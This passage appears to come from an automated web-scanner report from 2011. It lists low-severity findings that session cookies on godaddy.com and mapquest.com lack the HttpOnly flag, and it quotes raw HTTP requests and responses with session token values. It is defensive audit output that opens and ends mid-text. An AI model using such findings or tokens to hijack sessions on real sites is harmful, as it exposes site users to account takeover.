Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


11.9. https://www.godaddy.com/gdshop/website.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


11.10. http://www.mapquest.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
  • psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
  • t_Id=ZGVmYXVsdDpudWxs; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.11. http://www.mapquest.com/_svc/ad/getads  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

11.12. http://www.mapquest.com/_svc/apixel  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

11.13. http://www.mapquest.com/_svc/publishing/promo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

11.14. http://www.mapquest.com/_svc/searchio  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should rev